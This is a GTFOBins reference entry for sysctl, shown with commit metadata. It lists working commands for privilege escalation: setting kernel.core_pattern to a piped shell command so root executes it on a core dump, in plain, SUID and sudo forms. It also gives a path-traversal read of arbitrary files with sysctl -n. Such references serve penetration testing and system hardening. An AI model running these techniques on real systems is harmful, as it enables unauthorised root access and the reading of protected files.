GTFOBins.github.io/_gtfobins/sysctl.md
decrazyo 21e0166608
Update sysctl
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 17:12:13 +01:00

914 B

functions
command file-read suid sudo
description code
The command is executed by root in the background when a core dump occurs. COMMAND='/bin/sh -c id>/tmp/id' sysctl "kernel.core_pattern=|$COMMAND" sleep 9999 & kill -QUIT $! cat /tmp/id
description code
The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files. LFILE=file_to_read /usr/sbin/sysctl -n "/../../$LFILE"
code
COMMAND='/bin/sh -c id>/tmp/id' ./sysctl "kernel.core_pattern=|$COMMAND" sleep 9999 & kill -QUIT $! cat /tmp/id
code
COMMAND='/bin/sh -c id>/tmp/id' sudo sysctl "kernel.core_pattern=|$COMMAND" sleep 9999 & kill -QUIT $! cat /tmp/id